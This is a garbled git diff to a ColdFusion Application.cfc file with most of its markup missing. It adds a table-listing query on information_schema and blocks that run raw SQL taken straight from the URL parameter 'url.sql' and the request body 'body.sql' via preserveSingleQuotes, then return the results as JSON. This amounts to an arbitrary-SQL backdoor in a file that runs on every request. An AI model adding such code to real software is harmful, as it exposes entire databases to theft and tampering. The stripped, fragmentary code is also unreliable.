diff --git a/Application.cfc b/Application.cfc
index d51ce2f..918b4fb 100644
--- a/Application.cfc
+++ b/Application.cfc
@@ -14,6 +14,10 @@
+
+
+
+
+
+
+
+
+
+
+ SELECT 1 as ok
+
+
+
+
+ SELECT table_name FROM information_schema.tables
+ WHERE table_schema = 'public' ORDER BY table_name
+
+
+
+
+
+
+
+
+
+
+
+
+ #preserveSingleQuotes(sql)#
+
+
+
+
+
+
+
+
+
+
+ #preserveSingleQuotes(url.sql)#
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ #preserveSingleQuotes(body.sql)#
+
+
+
+
+
+
+
+#serializeJSON(result)#